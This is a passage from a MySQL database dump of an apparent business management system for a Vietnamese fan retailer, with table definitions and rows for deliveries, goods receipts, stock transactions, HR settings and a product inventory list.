(2, NULL, NULL, '1432', NULL, NULL, 'Riverpark 1, Block B - 335 Hà Huy Tập, Tân Phong, Quận 7', '', 0, '2024-01-17', '2024-01-17', 'XK385', NULL, '25075000', 1, 1, NULL, '25075000', '386', NULL, NULL, NULL, NULL, 'INV-376-24', NULL, 0.00, 'total', 0.00, 0.00, 'ready_for_packing'),
(3, NULL, NULL, '1427', NULL, '', ', , , ', '', 17, '2024-01-26', '2024-01-26', 'XK386', NULL, '22000000', 1, 1, '0', '22000000', '379', '', '', 0, 0, 'INV-369-24', 0, 0.00, 'total', 0.00, 22000000.00, 'ready_for_packing');

-- --------------------------------------------------------

--
-- Table structure for table `tblgoods_delivery_detail`
--

CREATE TABLE `tblgoods_delivery_detail` (
  `id` int(10) UNSIGNED NOT NULL,
  `goods_delivery_id` int(11) NOT NULL,
  `commodity_code` varchar(100) DEFAULT NULL,
  `commodity_name` text DEFAULT NULL,
  `warehouse_id` text DEFAULT NULL,
  `unit_id` text DEFAULT NULL,
  `quantities` text DEFAULT NULL,
  `unit_price` varchar(100) DEFAULT NULL,
  `total_money` varchar(200) DEFAULT NULL,
  `note` text DEFAULT NULL,
  `discount` varchar(100) DEFAULT NULL,
  `discount_money` varchar(100) DEFAULT NULL,
  `available_quantity` varchar(100) DEFAULT NULL,
  `tax_id` varchar(100) DEFAULT NULL,
  `total_after_discount` varchar(100) DEFAULT NULL,
  `expiry_date` text DEFAULT NULL,
  `lot_number` text DEFAULT NULL,
  `guarantee_period` text DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `tax_name` text DEFAULT NULL,
  `sub_total` decimal(15,2) DEFAULT 0.00,
  `packing_qty` decimal(15,2) DEFAULT 0.00,
  `serial_number` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblgoods_delivery_detail`
--

INSERT INTO `tblgoods_delivery_detail` (`id`, `goods_delivery_id`, `commodity_code`, `commodity_name`, `warehouse_id`, `unit_id`, `quantities`, `unit_price`, `total_money`, `note`, `discount`, `discount_money`, `available_quantity`, `tax_id`, `total_after_discount`, `expiry_date`, `lot_number`, `guarantee_period`, `tax_rate`, `tax_name`, `sub_total`, `packing_qty`, `serial_number`) VALUES
(1, 1, '1882', 'HA142_Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', '1', '1', '2', '5500000', '11000000', NULL, NULL, NULL, '12', '', '11000000', '', '', '', '', '', 0.00, 2.00, ''),
(7, 2, '1968', '_Quạt trần 3 cánh gỗ RUCKUS 60', '1', NULL, '2', '5395000', '10790000', NULL, NULL, NULL, '20', '', '10790000', '', '', '', '', '', 0.00, 0.00, ''),
(8, 3, '1913', 'HA173_Quạt trần cao cấp LINES 60 Black', '1', '', '4', '5500000', '22000000', '', '', '0', '20', NULL, '22000000', '', '', '', NULL, NULL, 22000000.00, 0.00, '');

-- --------------------------------------------------------

--
-- Table structure for table `tblgoods_delivery_invoices_pr_orders`
--

CREATE TABLE `tblgoods_delivery_invoices_pr_orders` (
  `id` int(10) UNSIGNED NOT NULL,
  `rel_id` int(11) DEFAULT NULL COMMENT 'goods_delivery_id',
  `rel_type` int(11) DEFAULT NULL COMMENT 'invoice_id or purchase order id',
  `type` varchar(100) DEFAULT NULL COMMENT 'invoice,  purchase_orders'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblgoods_delivery_invoices_pr_orders`
--

INSERT INTO `tblgoods_delivery_invoices_pr_orders` (`id`, `rel_id`, `rel_type`, `type`) VALUES
(1, 1, 393, 'invoice'),
(2, 1, 1, 'goods_delivery'),
(3, 3, 379, 'invoice');

-- --------------------------------------------------------

--
-- Table structure for table `tblgoods_receipt`
--

CREATE TABLE `tblgoods_receipt` (
  `id` int(10) UNSIGNED NOT NULL,
  `supplier_code` varchar(100) DEFAULT NULL,
  `supplier_name` text DEFAULT NULL,
  `deliver_name` text DEFAULT NULL,
  `buyer_id` int(11) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `pr_order_id` int(11) DEFAULT NULL COMMENT 'code puchase request agree',
  `date_c` date DEFAULT NULL,
  `date_add` date DEFAULT NULL,
  `goods_receipt_code` varchar(100) DEFAULT NULL,
  `warehouse_id` int(11) DEFAULT NULL,
  `total_tax_money` varchar(100) DEFAULT NULL,
  `total_goods_money` varchar(100) DEFAULT NULL,
  `value_of_inventory` varchar(100) DEFAULT NULL,
  `total_money` varchar(100) DEFAULT NULL COMMENT 'total_money = total_tax_money +total_goods_money ',
  `addedfrom` int(11) DEFAULT NULL,
  `approval` int(11) DEFAULT 0,
  `project` text DEFAULT NULL,
  `type` text DEFAULT NULL,
  `department` int(11) DEFAULT NULL,
  `requester` int(11) DEFAULT NULL,
  `expiry_date` date DEFAULT NULL,
  `invoice_no` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblgoods_receipt`
--

INSERT INTO `tblgoods_receipt` (`id`, `supplier_code`, `supplier_name`, `deliver_name`, `buyer_id`, `description`, `pr_order_id`, `date_c`, `date_add`, `goods_receipt_code`, `warehouse_id`, `total_tax_money`, `total_goods_money`, `value_of_inventory`, `total_money`, `addedfrom`, `approval`, `project`, `type`, `department`, `requester`, `expiry_date`, `invoice_no`) VALUES
(1, '', 'SUNON Taiwan', '', 2, '', 0, '2024-01-24', '2024-01-15', 'NK38', 0, '36960000', '462000000', '462000000', '498960000', 1, 1, '', '', 0, 0, '2024-01-24', '');

-- --------------------------------------------------------

--
-- Table structure for table `tblgoods_receipt_detail`
--

CREATE TABLE `tblgoods_receipt_detail` (
  `id` int(10) UNSIGNED NOT NULL,
  `goods_receipt_id` int(11) NOT NULL,
  `commodity_code` varchar(100) DEFAULT NULL,
  `commodity_name` text DEFAULT NULL,
  `warehouse_id` text DEFAULT NULL,
  `unit_id` text DEFAULT NULL,
  `quantities` text DEFAULT NULL,
  `unit_price` varchar(100) DEFAULT NULL,
  `tax` varchar(100) DEFAULT NULL,
  `tax_money` varchar(100) DEFAULT NULL,
  `goods_money` varchar(100) DEFAULT NULL,
  `date_manufacture` date DEFAULT NULL,
  `expiry_date` date DEFAULT NULL,
  `note` text DEFAULT NULL,
  `discount` varchar(100) DEFAULT NULL,
  `discount_money` varchar(100) DEFAULT NULL,
  `lot_number` varchar(100) DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `sub_total` decimal(15,2) DEFAULT 0.00,
  `tax_name` text DEFAULT NULL,
  `serial_number` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblgoods_receipt_detail`
--

INSERT INTO `tblgoods_receipt_detail` (`id`, `goods_receipt_id`, `commodity_code`, `commodity_name`, `warehouse_id`, `unit_id`, `quantities`, `unit_price`, `tax`, `tax_money`, `goods_money`, `date_manufacture`, `expiry_date`, `note`, `discount`, `discount_money`, `lot_number`, `tax_rate`, `sub_total`, `tax_name`, `serial_number`) VALUES
(1, 1, '1812', 'HA072_Quạt trần cánh lớn Powerful S1 sải cánh 3m', '1', '1', '15', '30800000', '2', '36960000', '498960000', '2023-12-01', '2024-01-24', '', NULL, NULL, '', '8.00', 462000000.00, 'Thuế GTGT 8%', '');

-- --------------------------------------------------------

--
-- Table structure for table `tblgoods_transaction_detail`
--

CREATE TABLE `tblgoods_transaction_detail` (
  `id` int(10) UNSIGNED NOT NULL,
  `goods_receipt_id` int(11) DEFAULT NULL COMMENT 'id_goods_receipt_id or goods_delivery_id',
  `goods_id` int(11) NOT NULL COMMENT ' is id commodity',
  `old_quantity` varchar(100) DEFAULT NULL,
  `quantity` varchar(100) DEFAULT NULL,
  `date_add` datetime DEFAULT NULL,
  `commodity_id` int(11) NOT NULL,
  `warehouse_id` text NOT NULL,
  `note` text DEFAULT NULL,
  `status` int(11) DEFAULT NULL COMMENT '1:Goods receipt note 2:Goods delivery note',
  `purchase_price` varchar(100) DEFAULT NULL,
  `price` varchar(100) DEFAULT NULL,
  `expiry_date` text DEFAULT NULL,
  `lot_number` text DEFAULT NULL,
  `from_stock_name` int(11) DEFAULT NULL,
  `to_stock_name` int(11) DEFAULT NULL,
  `serial_number` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblgoods_transaction_detail`
--

INSERT INTO `tblgoods_transaction_detail` (`id`, `goods_receipt_id`, `goods_id`, `old_quantity`, `quantity`, `date_add`, `commodity_id`, `warehouse_id`, `note`, `status`, `purchase_price`, `price`, `expiry_date`, `lot_number`, `from_stock_name`, `to_stock_name`, `serial_number`) VALUES
(1, 0, 0, '0', '1000', '2024-01-23 13:55:50', 1932, '1', 'Nhập tồn kho đầu kỳ', 1, '0.00', NULL, '', '', NULL, NULL, NULL),
(2, 0, 0, '0', '12', '2024-01-23 13:57:57', 1882, '1', 'Nhập tồn kho đầu kỳ', 1, '0.00', NULL, NULL, NULL, NULL, NULL, NULL),
(3, 0, 0, '0', '5', '2024-01-23 13:58:34', 1943, '1', 'Nhập tồn kho đầu kỳ', 1, '0.00', NULL, NULL, NULL, NULL, NULL, NULL),
(4, 0, 0, '0', '13', '2024-01-23 13:59:10', 1944, '1', 'Nhập tồn kho đầu kỳ', 1, '5600000.00', NULL, NULL, NULL, NULL, NULL, NULL),
(5, 0, 0, '0', '6', '2024-01-23 13:59:37', 1953, '1', 'Nhập tồn kho đầu kỳ', 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(6, 0, 0, '0', '20', '2024-01-23 14:02:30', 1913, '1', 'Nhập tồn kho đầu kỳ', 1, '0.00', NULL, NULL, NULL, NULL, NULL, NULL),
(7, 0, 0, '0', '20', '2024-01-23 14:02:55', 1968, '1', 'Nhập tồn kho đầu kỳ', 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(8, 1, 1, NULL, '15', '2024-01-24 09:11:23', 1812, '1', '', 1, '30800000', NULL, '2024-01-24', '', NULL, NULL, ''),
(9, 1, 1, '10', '2', '2024-01-26 08:23:05', 1882, '1', NULL, 2, NULL, '5500000', NULL, NULL, NULL, NULL, ''),
(15, 2, 7, '18', '2', '2024-01-26 14:19:27', 1968, '1', NULL, 2, NULL, '5395000', NULL, NULL, NULL, NULL, ''),
(16, 0, 0, '0', '4', '2024-01-26 14:23:24', 1855, '1', 'Nhập tồn kho đầu kỳ', 1, '6300000.00', NULL, NULL, NULL, NULL, NULL, NULL),
(17, 3, 8, '16', '4', '2024-01-26 14:42:30', 1913, '1', '', 2, NULL, '5500000', NULL, NULL, NULL, NULL, ''),
(18, 0, 0, '0', '17', '2024-01-26 15:07:46', 1948, '1', 'Nhập tồn kho đầu kỳ', 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(19, 0, 0, '0', '3', '2024-01-26 15:08:27', 1850, '1', 'Nhập tồn kho đầu kỳ', 1, '0.00', NULL, NULL, NULL, NULL, NULL, NULL),
(20, 0, 0, '0', '5', '2024-01-26 15:08:52', 1853, '1', 'Nhập tồn kho đầu kỳ', 1, '0.00', NULL, NULL, NULL, NULL, NULL, NULL),
(21, 0, 0, '0', '4', '2024-01-26 15:09:17', 1852, '1', 'Nhập tồn kho đầu kỳ', 1, '0.00', NULL, NULL, NULL, NULL, NULL, NULL),
(22, 0, 0, '0', '2', '2024-01-26 15:10:44', 1840, '1', 'Nhập tồn kho đầu kỳ', 1, '0.00', NULL, NULL, NULL, NULL, NULL, NULL),
(23, 0, 0, '0', '2', '2024-01-26 15:13:23', 1963, '1', 'Nhập tồn kho đầu kỳ', 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tblhrm_option`
--

CREATE TABLE `tblhrm_option` (
  `option_id` int(10) UNSIGNED NOT NULL,
  `option_name` varchar(200) NOT NULL,
  `option_val` longtext DEFAULT NULL,
  `auto` tinyint(1) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblhrm_option`
--

INSERT INTO `tblhrm_option` (`option_id`, `option_name`, `option_val`, `auto`) VALUES
(1, 'hrm_contract_form', '[]', 1),
(2, 'hrm_leave_position', '[]', 1),
(3, 'hrm_leave_contract_type', '[]', 1),
(4, 'hrm_leave_start_date', NULL, 1),
(5, 'hrm_max_leave_in_year', NULL, 1),
(6, 'hrm_start_leave_from_month', NULL, 1),
(7, 'hrm_start_leave_to_month', NULL, 1),
(8, 'hrm_add_new_leave_month_from_date', NULL, 1),
(9, 'hrm_accumulated_leave_to_month', NULL, 1),
(10, 'hrm_leave_contract_sign_day', NULL, 1),
(11, 'hrm_start_date_seniority', NULL, 1),
(12, 'hrm_seniority_year', NULL, 1),
(13, 'hrm_seniority_year_leave', NULL, 1),
(14, 'hrm_next_year', NULL, 1),
(15, 'hrm_next_year_leave', NULL, 1),
(16, 'alow_borrow_leave', NULL, 1),
(17, 'contract_type_borrow', '[]', 1),
(18, 'max_leave_borrow', NULL, 1),
(19, 'day_increases_monthly', '15', 1),
(20, 'sign_a_labor_contract', '1', 1),
(21, 'maternity_leave_to_return_to_work', '1', 1),
(22, 'unpaid_leave_to_return_to_work', '1', 1),
(23, 'increase_the_premium', '1', 1),
(24, 'day_decreases_monthly', '5', 1),
(25, 'contract_paid_for_unemployment', '1', 1),
(26, 'maternity_leave_regime', '1', 1),
(27, 'unpaid_leave_of_more_than', '10', 1),
(28, 'reduced_premiums', '1', 1);

-- --------------------------------------------------------

--
-- Table structure for table `tblhrm_timesheet`
--

CREATE TABLE `tblhrm_timesheet` (
  `id` int(11) NOT NULL,
  `staff_id` int(11) NOT NULL,
  `date_work` date NOT NULL,
  `value` text DEFAULT NULL,
  `type` varchar(45) DEFAULT NULL,
  `add_from` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblinsurance_type`
--

CREATE TABLE `tblinsurance_type` (
  `id` int(11) NOT NULL,
  `from_month` date NOT NULL,
  `social_company` varchar(15) DEFAULT NULL,
  `social_staff` varchar(15) DEFAULT NULL,
  `labor_accident_company` varchar(15) DEFAULT NULL,
  `labor_accident_staff` varchar(15) DEFAULT NULL,
  `health_company` varchar(15) DEFAULT NULL,
  `health_staff` varchar(15) DEFAULT NULL,
  `unemployment_company` varchar(15) DEFAULT NULL,
  `unemployment_staff` varchar(15) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblinternal_delivery_note`
--

CREATE TABLE `tblinternal_delivery_note` (
  `id` int(10) UNSIGNED NOT NULL,
  `internal_delivery_name` text DEFAULT NULL,
  `description` text DEFAULT NULL,
  `staff_id` int(11) DEFAULT NULL,
  `date_c` date DEFAULT NULL,
  `date_add` date DEFAULT NULL,
  `internal_delivery_code` varchar(100) DEFAULT NULL,
  `approval` int(11) DEFAULT 0 COMMENT 'status approval ',
  `addedfrom` int(11) DEFAULT NULL,
  `total_amount` decimal(15,2) DEFAULT NULL,
  `datecreated` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblinternal_delivery_note_detail`
--

CREATE TABLE `tblinternal_delivery_note_detail` (
  `id` int(10) UNSIGNED NOT NULL,
  `internal_delivery_id` int(11) NOT NULL,
  `commodity_code` varchar(100) DEFAULT NULL,
  `from_stock_name` text DEFAULT NULL,
  `to_stock_name` text DEFAULT NULL,
  `unit_id` text DEFAULT NULL,
  `available_quantity` text DEFAULT NULL,
  `quantities` text DEFAULT NULL,
  `unit_price` varchar(100) DEFAULT NULL,
  `into_money` varchar(100) DEFAULT NULL,
  `note` text DEFAULT NULL,
  `commodity_name` text DEFAULT NULL,
  `serial_number` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblinventory_commodity_min`
--

CREATE TABLE `tblinventory_commodity_min` (
  `id` int(10) UNSIGNED NOT NULL,
  `commodity_id` int(11) NOT NULL,
  `commodity_code` varchar(100) DEFAULT NULL,
  `commodity_name` varchar(100) DEFAULT NULL,
  `inventory_number_min` varchar(100) DEFAULT NULL,
  `inventory_number_max` varchar(100) DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblinventory_commodity_min`
--

INSERT INTO `tblinventory_commodity_min` (`id`, `commodity_id`, `commodity_code`, `commodity_name`, `inventory_number_min`, `inventory_number_max`) VALUES
(115, 1741, 'HA001', 'Quạt gắn tường công nghiệp AirEye', '0', '0'),
(116, 1742, 'HA002', 'Quạt công nghiệp gắn tường Yellow Jack', '0', '0'),
(117, 1743, 'HA003', 'Quạt công nghiệp gắn tường Pivot 2.0', '0', '0'),
(118, 1744, 'HA004', 'Quạt công nghiệp thổi sàn Sidekick', '0', '0'),
(119, 1745, 'HA005', 'Quạt công nghiệp thổi sàn AirGo 2.0', '0', '0'),
(120, 1746, 'HA006', 'Quạt công nghiệp thổi sàn Black Jack', '0', '0'),
(121, 1747, 'HA007', 'Quạt trần công nghiệp nhà xưởng POWERFOIL 8 Plus - 12ft', '0', '0'),
(122, 1748, 'HA008', 'Quạt trần công nghiệp nhà xưởng POWERFOIL 8 Plus - 14ft', '0', '0'),
(123, 1749, 'HA009', 'Quạt trần công nghiệp nhà xưởng POWERFOIL 8 Plus - 16ft', '0', '0'),
(124, 1750, 'HA010', 'Quạt treo trần công nghiệp POWERFOIL X3.0 - 8ft', '0', '0'),
(125, 1751, 'HA011', 'Quạt treo trần công nghiệp POWERFOIL X3.0 - 10ft', '0', '0'),
(126, 1752, 'HA012', 'Quạt treo trần công nghiệp POWERFOIL X3.0 - 12ft', '0', '0'),
(127, 1753, 'HA013', 'Quạt treo trần công nghiệp POWERFOIL X3.0 - 14ft', '0', '0'),
(128, 1754, 'HA014', 'Quạt treo trần công nghiệp POWERFOIL X3.0 - 16ft', '0', '0'),
(129, 1755, 'HA015', 'Quạt treo trần nhà xưởng POWERFOIL X3.0 PLUS - 12ft', '0', '0'),
(130, 1756, 'HA016', 'Quạt treo trần nhà xưởng POWERFOIL X3.0 PLUS - 14ft', '0', '0'),
(131, 1757, 'HA017', 'Quạt treo trần nhà xưởng POWERFOIL X3.0 PLUS - 16ft', '0', '0'),
(132, 1758, 'HA018', 'Quạt trần công nghiệp POWERFOIL X3.0 PLUS - 24ft', '0', '0'),
(133, 1759, 'HA019', 'Quạt treo trần nhà xưởng POWERFOIL X3.0 PLUS - 20ft', '0', '0'),
(134, 1760, 'HA020', 'Quạt treo trần nhà xưởng POWERFOIL X3.0 PLUS - 18ft', '0', '0'),
(135, 1761, 'HA021', 'Quạt trần công nghiệp nhà xưởng POWERFOIL 8 - 12ft', '0', '0'),
(136, 1762, 'HA022', 'Quạt trần công nghiệp nhà xưởng POWERFOIL 8 - 14ft', '0', '0'),
(137, 1763, 'HA023', 'Quạt trần công nghiệp nhà xưởng POWERFOIL 8 - 16ft', '0', '0'),
(138, 1764, 'HA024', 'Quạt trần công nghiệp thương mại Powerfoil D 8ft', '0', '0'),
(139, 1765, 'HA025', 'Quạt trần công nghiệp thương mại Powerfoil D 12ft', '0', '0'),
(140, 1766, 'HA026', 'Quạt trần công nghiệp thương mại Powerfoil D 10ft', '0', '0'),
(141, 1767, 'HA027', 'Quạt trần công nghiệp thương mại Powerfoil D 14ft', '0', '0'),
(142, 1768, 'HA028', 'Quạt trần công nghiệp thương mại Powerfoil D 16ft', '0', '0'),
(143, 1769, 'HA029', 'Quạt trần công nghiệp thương mại Powerfoil D 18ft', '0', '0'),
(144, 1770, 'HA030', 'Quạt trần công nghiệp thương mại Powerfoil D 20ft', '0', '0'),
(145, 1771, 'HA031', 'Quạt trần công nghiệp Powerfoil D 24ft', '0', '0'),
(146, 1772, 'HA032', 'Quạt trần công nghiệp nhà xưởng POWERFOIL 8 Plus - 18ft', '0', '0'),
(147, 1773, 'HA033', 'Quạt treo trần công nghiệp POWERFOIL X3.0 - 18ft', '0', '0'),
(148, 1774, 'HA034', 'Quạt treo trần công nghiệp POWERFOIL X3.0 - 20ft', '0', '0'),
(149, 1775, 'HA035', 'Quạt trần công nghiệp POWERFOIL X3.0 - 24ft', '0', '0'),
(150, 1776, 'HA036', 'Quạt trần công nghiệp nhà xưởng POWERFOIL 8 Plus - 20ft', '0', '0'),
(151, 1777, 'HA037', 'Quạt trần công nghiệp POWERFOIL 8 Plus - 24ft', '0', '0'),
(152, 1778, 'HA038', 'Quạt trần công nghiệp nhà xưởng POWERFOIL 8 - 18ft', '0', '0'),
(153, 1779, 'HA039', 'Quạt trần công nghiệp nhà xưởng POWERFOIL 8 - 20ft', '0', '0'),
(154, 1780, 'HA040', 'Quạt trần công nghiệp POWERFOIL 8 - 24ft', '0', '0'),
(155, 1781, 'HA041', 'Quạt trần Essence dành cho Lobby khách sạn Resort', '0', '0'),
(156, 1782, 'HA042', 'Bộ điều khiển Wall Control Wireless dành cho quạt Essence', '0', '0'),
(157, 1783, 'HA043', 'Bộ điều khiển Wall Control Wire dành cho quạt Essence', '0', '0'),
(158, 1784, 'HA044', 'Module Wi-Fi dành cho quạt Haiku L series', '0', '0'),
(159, 1785, 'HA045', 'Bộ điều khiển APP (iOS/Android)', '0', '0'),
(160, 1786, 'HA046', 'Bộ điều khiển Standard Control dành cho PF8, PFD', '0', '0'),
(161, 1787, 'HA047', 'Bộ điều khiển Dewtect', '0', '0'),
(162, 1788, 'HA048', 'Bộ điều khiển BAFWorks', '0', '0'),
(163, 1789, 'HA049', 'Bộ điều khiển BAFCon', '0', '0'),
(164, 1790, 'HA050', 'Bộ điều khiển 7 tốc độ Haiku L Series', '0', '0'),
(165, 1791, 'HA051', 'Bộ điều khiển 7 tốc độ Haiku H, I Series', '0', '0'),
(166, 1792, 'HA052', 'Bộ điều khiển gắn tường (Wall Control) Haiku 7 tốc độ', '0', '0'),
(167, 1793, 'HA053', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '0', '0'),
(168, 1794, 'HA054', 'Bộ điều khiển DC gắn tường vuông 6 tốc độ Tổ chức đào tạo WIT', '0', '0'),
(169, 1795, 'HA055', 'Bộ điều khiển DC 6 tốc độ Mountair Air', '0', '0'),
(170, 1796, 'HA056', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', '0', '0'),
(171, 1797, 'HA057', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', '0', '0'),
(172, 1798, 'HA058', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '0', '0'),
(173, 1799, 'HA059', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', '0', '0'),
(174, 1800, 'HA060', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 5m', '0', '0'),
(175, 1801, 'HA061', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 4m', '0', '0'),
(176, 1802, 'HA062', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 5m5', '0', '0'),
(177, 1803, 'HA063', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 6m1', '0', '0'),
(178, 1804, 'HA064', 'Quạt trần thông minh cánh lớn i6 sải cánh 60 inch', '0', '0'),
(179, 1805, 'HA065', 'Quạt trần thông minh cánh lớn i6 sải cánh 72 inch', '0', '0'),
(180, 1806, 'HA066', 'Quạt trần thông minh cánh lớn i6 sải cánh 84 inch', '0', '0'),
(181, 1807, 'HA067', 'Quạt trần cánh lớn Powerful S3 sải cánh 2m5', '0', '0'),
(182, 1808, 'HA068', 'Quạt trần cánh lớn Powerful S3 sải cánh 3m', '0', '0'),
(183, 1809, 'HA069', 'Quạt trần cánh lớn Powerful S3 sải cánh 3m6', '0', '0'),
(184, 1810, 'HA070', 'Quạt trần cánh lớn Powerful S3 sải cánh 4m3', '0', '0'),
(185, 1811, 'HA071', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m', '0', '0'),
(186, 1812, 'HA072', 'Quạt trần cánh lớn Powerful S1 sải cánh 3m', '0', '0'),
(187, 1813, 'HA073', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', '0', '0'),
(188, 1814, 'HA074', 'Quạt trần cánh lớn Essence 4m3 ', '0', '0'),
(189, 1815, 'HA075', 'Quạt trần cánh lớn Essence 3m6 ', '0', '0'),
(190, 1816, 'HA076', 'Quạt trần cánh lớn Essence 3m ', '0', '0'),
(191, 1817, 'HA077', 'Quạt trần cánh lớn Essence 2m4 ', '0', '0'),
(192, 1818, 'HA078', 'Quạt trần cổ điển MAREILLY 52 Black Metal Blades', '0', '0'),
(193, 1819, 'HA079', 'Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades', '0', '0'),
(194, 1820, 'HA080', 'Quạt trần cổ điển MAREILLY 52 White Wood Metal Blades', '0', '0'),
(195, 1821, 'HA081', 'Haiku Outdoor Driftwood Alumium', '0', '0'),
(196, 1822, 'HA082', 'Haiku Outdoor Brushed Aluminum', '0', '0'),
(197, 1823, 'HA083', 'Haiku Outdoor Brushed Copper', '0', '0'),
(198, 1824, 'HA084', 'Haiku Outdoor White Aluminum', '0', '0'),
(199, 1825, 'HA085', 'Haiku Outdoor Black Aluminum', '0', '0'),
(200, 1826, 'HA086', 'Haiku Outdoor Satin Nickel', '0', '0'),
(201, 1827, 'HA087', 'Haiku Outdoor Oil Rubbed Bronze', '0', '0'),
(202, 1828, 'HA088', 'Haiku Outdoor Cocoa Aluminum', '0', '0'),
(203, 1829, 'HA089', 'Haiku Outdoor Caramel Aluminum', '0', '0'),
(204, 1830, 'HA090', 'Haiku 84 inch White Aluminium', '0', '0'),
(205, 1831, 'HA091', 'Haiku 60 inch White Aluminium', '0', '0'),
(206, 1832, 'HA092', 'Haiku 52 inch White Aluminium', '0', '0'),
(207, 1833, 'HA093', 'Haiku 60 inch Black Aluminium', '0', '0'),
(208, 1834, 'HA094', 'Haiku 52 inch Black Aluminium', '0', '0'),
(209, 1835, 'HA095', 'Haiku 84 inch Black Aluminium', '0', '0'),
(210, 1836, 'HA096', 'Haiku 84 inch Caramel Bamboo', '0', '0'),
(211, 1837, 'HA097', 'Haiku 84 inch Cocoa Bamboo', '0', '0'),
(212, 1838, 'HA098', 'Quạt trần cao cấp Haiku H Brushed Alumium', '0', '0'),
(213, 1839, 'HA099', 'Quạt trần cao cấp Haiku H Satin Nickel', '0', '0'),
(214, 1840, 'HA100', 'Haiku 60 inch Caramel Bamboo', '0', '0'),
(215, 1841, 'HA101', 'Haiku 60 inch Cocoa Bamboo', '0', '0'),
(216, 1842, 'HA102', 'Haiku 52 inch Cocoa Bamboo', '0', '0'),
(217, 1843, 'HA103', 'Haiku 52 inch Caramel Bamboo', '0', '0'),
(218, 1844, 'HA104', 'Haiku I 52 inch Black with SenseME', '0', '0'),
(219, 1845, 'HA105', 'Haiku I 52 inch White with SenseME', '0', '0'),
(220, 1846, 'HA106', 'Haiku I 60 inch White with SenseME', '0', '0'),
(221, 1847, 'HA107', 'Haiku I 60 inch Black with SenseME', '0', '0'),
(222, 1848, 'HA108', 'Haiku L 60 inch White', '0', '0'),
(223, 1849, 'HA109', 'Haiku L 60 inch Black', '0', '0'),
(224, 1850, 'HA110', 'Haiku L 52 inch White', '0', '0'),
(225, 1851, 'HA111', 'Haiku L 52 inch Black', '0', '0'),
(226, 1852, 'HA112', 'Haiku L 44 inch Black', '0', '0'),
(227, 1853, 'HA113', 'Haiku L 44 inch White', '0', '0'),
(228, 1854, 'HA114', 'Quạt trần SINO LED 52 Black Wood', '0', '0'),
(229, 1855, 'HA115', 'Quạt trần SINO LED 52 White Wood', '0', '0'),
(230, 1856, 'HA116', 'Quạt trần SINO LED 52 Brush Nickel Maple Wood', '0', '0'),
(231, 1857, 'HA117', 'Quạt trần SINO LED 52 Black Dark Wood', '0', '0'),
(232, 1858, 'HA118', 'Quạt trần cao cấp IRIS 60 White ABS', '0', '0'),
(233, 1859, 'HA119', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '0', '0'),
(234, 1860, 'HA120', 'Quạt trần 3 cánh gỗ MORIS 52 Dark Wood', '0', '0'),
(235, 1861, 'HA121', 'Quạt trần cao cấp IRIS 60 KOA ABS', '0', '0'),
(236, 1862, 'HA122', 'Quạt trần cao cấp IRIS 60 Black ABS', '0', '0'),
(237, 1863, 'HA123', 'Quạt trần 3 cánh gỗ AKMANI 52 LED BN Maple Wood', '0', '0'),
(238, 1864, 'HA124', 'Quạt trần 3 cánh gỗ AKMANI 52 BN Maple Wood', '0', '0'),
(239, 1865, 'HA125', 'Quạt trần 3 cánh gỗ AKMANI 52 LED Dark Wood', '0', '0'),
(240, 1866, 'HA126', 'Quạt trần thấp AROMA 52 LED Dark Walnut (màu gỗ tối)', '0', '0'),
(241, 1867, 'HA127', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', '0', '0'),
(242, 1868, 'HA128', 'Quạt trần HAMACHI 52 LED Black', '0', '0'),
(243, 1869, 'HA129', 'Quạt trần HAMACHI 52 LED KOA', '0', '0'),
(244, 1870, 'HA130', 'Quạt trần cánh gỗ CRANE 52 Black Maple Wood', '0', '0'),
(245, 1871, 'HA131', 'Quạt trần cánh gỗ PICA 60 Dark Wood', '0', '0'),
